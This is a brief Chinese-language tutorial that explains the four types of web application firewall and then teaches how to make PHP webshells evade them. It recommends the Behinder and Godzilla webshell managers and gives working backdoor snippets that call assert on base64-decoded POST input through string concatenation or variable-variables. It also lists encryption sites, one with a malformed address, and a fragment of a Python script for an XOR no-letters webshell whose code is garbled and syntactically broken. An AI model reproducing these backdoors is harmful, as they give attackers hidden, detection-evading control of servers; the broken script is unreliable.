1.什么是WAF?
Web Application Firewal(web应用防火墙),web应用防火通过执行一系列针对HTTP/HTTPS的安全策略来专门为web应用提供保护的一款产品,基本可以分为以下4种
软件型WAF:以软件的形式安装在服务器上面,可以接触到服务器上的文件,因此就可以检测服务器上是否有webshell,是否有文件被创建等,
硬件型WAF:以硬件形式部署在链路中,支持多种部警方式。当串联到链路上时可以拦恶意流量,在旁路监听模式时只记录攻击但是不进行拦截,
云 WAF:一般以反向代理的形式工作,通过配置后,便对网站的请求数据优先经过WAF主机,在WAF主机对数据进行过涉后再传给服务器
网站内置的WAF:就是来目网站内部的过滤,直接出现在网站代码中,比如说对给入的参数强制类转换,对输入的参数进行敏感词检测
2.工具
推荐:天蝎、哥斯拉
3.脚本后门免杀
(1)php 传参绕过,原理是绕过正则表达式匹配关键函数代码,相当于把关键字的函数代码以参数值发送,不在代码中体现。
<?php
$a=$_GET['a'];
$aa=$a.'ert';
$aa(base64_decode($_POST['X'])):
?>?a=ass
x=cGhwaW5mbygpOw==
(2)php变量覆盖
<?php
$a='b';
$b='assert';
$$a(base64_decode($_POST['x']));
?>
(3)php加密变异
http://www.phpjm.net
https://www.phpjms.com/
http://1.15.155.76.1234/
思路:将webshell加密,上传过程中则不会被检测出,然后传参时使用参数加密绕过参数检测
(4)php异或运算,无字符webshell
import requests
import time
import threading.queue
def string(
while not q.empty()
filename=q.get()
url ='http://127.0.0.1:8081/x/+filename
datas =
'x':'phpinfo();'
result requests.post(url,data=datas).content decode('utf-8')
if 'XIAODI-PC'in result
(5)php脚本生成器
Webshell-venom
ASP PHP JSP ASPX
使用工具生成php文件后放到Webshell-venom所在位置,使用命令生成脚本免杀